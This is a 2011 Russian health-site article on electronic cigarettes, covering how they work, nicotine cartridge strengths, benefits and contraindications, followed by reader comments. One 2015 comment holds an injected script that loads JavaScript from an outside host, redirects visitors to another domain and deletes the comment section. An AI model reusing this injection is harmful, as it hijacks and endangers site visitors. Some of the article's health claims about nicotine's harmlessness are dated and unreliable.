Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Электронные сигареты  >>  Электронные сигареты
 
Обратная связь
 

Электронные сигареты

Размер шрифта
10 марта 2011 00:00
  • google_analytics: false
  • Нравится

Тем, кто попал в ловушку, называемую «курение», не так-то просто из нее выбраться. Даже осознавая всю пагубность своей привычки, человек годами не может освободиться от нее. Пластыри и жвачки, книги с советами и гипноз, леденцы и кальян – все идет в ход ради этой цели. А несколько лет назад появился и еще один способ, говорят, весьма действенный. Электронная сигарета.

Вообще способ отвыкания от курения будет проще подобрать, если определить с помощью врача-нарколога ваш тип зависимости. Все лекарства от курения делятся на две группы – содержащие никотин (или его аналоги – алкалоиды) и не содержащие. Те, кто курит давно, более 5 лет, скорее всего, обладают физиологической зависимостью от никотина – они берут сигарету для того, чтобы насытить никотином свою кровь. Те же, кто курит недавно, чаще всего имеют психологическую зависимость от курения, то есть курят за компанию или в напряженные, сложные для себя моменты жизни, или же просто вследствие невротической привычки «занять чем-то рот». Конечно, все зависит от каждой конкретной ситуации и не всегда стаж курения определяет тип зависимости. Поэтому препараты могут варьироваться.

Но все же, именно тип зависимости должен стать определяющим в выборе замены сигарете. Таблетки, пластыри, жвачки (или еще что-то) с содержанием никотина помогает, плавно снижая его дозу, помочь физиологически зависимому человеку отвыкнуть от курения. При этом курильщик не получает отравы в виде продуктов горения табака (смолы и другие канцерогены), а никотин, как известно, попав в организм и вызвав некоторую реакцию нервной системы (например, учащение пульса) через несколько часов выводится из организма, не оседая ни в легких, ни в сосудах.

Что такое электронные сигареты, сигары и трубки?

Это электронное устройство, имитирующее вкусовые ощущения настоящего курения, но не содержащее продуктов горения табака, а только очищенный никотин, хотя некоторые картриджи не содержат и никотина. Оно подойдет людям и с физиологической, и с психологической зависимостью, так как может варьировать поступление никотина в организм, а также с точностью имитирует сам ритуал затяжек и выдоха дыма, роль которого исполняет влажный пар.

Все такого рода устройства выглядят как настоящие их прообразы и состоят из 3 составляющих: батарея, парогенератор и картридж с жидкостью, которая может содержать никотин, а может и не содержать. Стоит человеку сделать затяжку, автоматически батарейкой приводится в действие парогенератор, и на конце сигареты загорает световой индикатор. Парогенератор нагревает воздух, это вызывает испарение жидкости из картриджа. Курильщик вдыхает «дым», являющийся на самом деле паром, который через несколько секунд испаряется и не оставляет никакого запаха. Сигарета отключится сама собой, как только пропадет тяга.

Единственное, что требуется от хозяина, это своевременно перезаряжать батарейку и менять картриджи. Истощение батарейки легко заметить по слабо идущему пару и по специальному сигналу индикатора на кончике. В среднем батарейки хватает на несколько часов работы.

Как устроен картридж

Отвыкание от физиологической зависимости намного легче проходит при плавно снижаемой дозе никотина и полном отсутствии смол и оксида углерода, что как раз и обеспечивает электронная сигарета. Таким образом, вред курения сводится к минимуму и есть шанс постепенно вообще отвыкнуть от него, меняя картриджи по содержанию в них никотина – то есть, взяв курс на его плавное снижение.

Высоким содержанием никотина (HI) в картриджах считается 1.8 мг никотина, это примерно столько же, сколько содержится в обычной сигарете. Среднее содержание (MED) – 1.4 мг никотина, приближается к содержанию никотина в дамских сигаретах «light». Низкое (LOW) –1.1 мг, можно сравнить с сигаретами «Super light», ниже него только нулевые электронные сигареты, вообще без никотина.

Один картридж выкуривается примерно за 300 затяжек, то есть примерно столько же, сколько требуется и для выкуривания пачки обычных сигарет в 20 штук. Дальше картридж меняется на новый или заправляется жидкостью из специального баллончика. В среднем картридж допускает две заправки. Производители предупреждают: ни в коем случае нельзя проводить эксперименты и примешивать что-либо в жидкость для картриджа.

Несмотря на то, что электронные сигареты содержат никотин, в них, несомненно, есть большие преимущества.

Преимущества электронных сигарет

  • В отличие от никотиновых таблеток и пластырей, человек не испытывает стресса от расставания с привычным ритуалом ведь электронная сигарета – это 100% имитация курения.
  • Это реальная возможность постепенного снижения потребляемого никотина без отказа от привычки курить.
  • Отсутствует вред от вдыхания смол и продуктов, выделяемых при горении табака и бумаги в обычных сигаретах.
  • Нет запаха в доме, от одежды, от рук и волос. Вернее запах есть, но это легкий и приятный аромат, который, кстати, можно выбрать из целого спектра. Хочешь – будет пахнуть почти как настоящая сигарета, хочешь как яблоко или мята.
  • Не желтеют пальцы и зубы.
  • Не страдают окружающие, которые обычно являются пассивными курильщиками.

Некоторые противопоказания электронных сигарет

Единственной группой, которая может употреблять это устройство, являются зависимые от курения люди в возрасте от 21 года. Противопоказаны они следующим группам населения:

  • Беременным и кормящим женщинам.
  • Людям с заболеваниями сердечнососудистой системы (как, впрочем, запрещено им и обычное курение).
  • Диабетикам.
  • Астматикам, принимающим определенные лекарства.
  • Некурящим людям. Начав курить электронные сигареты, они скоро попадут в зависимость от никотина.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - nnpcto

08 февраля 2012 в 07:23

Цитировать   |   Пожаловаться

Но все-равно полезной её назвать нельзя.

2 - Гость

20 августа 2012 в 12:21

Цитировать   |   Пожаловаться

Ну так и вреда от неё несравнимо меньше.

3 - Гость

14 декабря 2012 в 18:10

Цитировать   |   Пожаловаться

Ну и глупости же абсолютно несведущего человека описаны в статейке об электронных сигаретах... Кто вам сказал, что то, что вы описали - и есть вся правда о них? Кто доказал их вред? Кто доказал даже хотя бы вред того же никотина? О чём Вы? Отрабатываете полученные от "табачных лобби" деньги? И не стыдно Вам, мадам? У вас ведь вроде бы и образование какое-никакое есть, и жизнь прожили довольно долгую - а так и не усвоили, что врать - нехорошо, а врать за деньги - вдвойне плохо. Стыдно за Вас!

Гость 14 декабря 2012 в 18:10
Кто доказал их вред? Кто доказал даже хотя бы вред того же никотина? О чём Вы?  И не стыдно Вам, мадам? У вас ведь вроде бы и образование какое-никакое есть,
Вред никотина в определенной дозе, увы, доказан еще в прошлом веке, так что ломать копья по этому поводу не стоит, не продуктивно. 

Вы статью-то прочтите.  В статье как раз все вполне лояльно по отношению к электронным сигаретам. Как вариант выбора для перехода от курения к полному отказу от сигарет, по отзывам, они работают

5 - zzzzzz

01 июля 2015 в 00:17

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.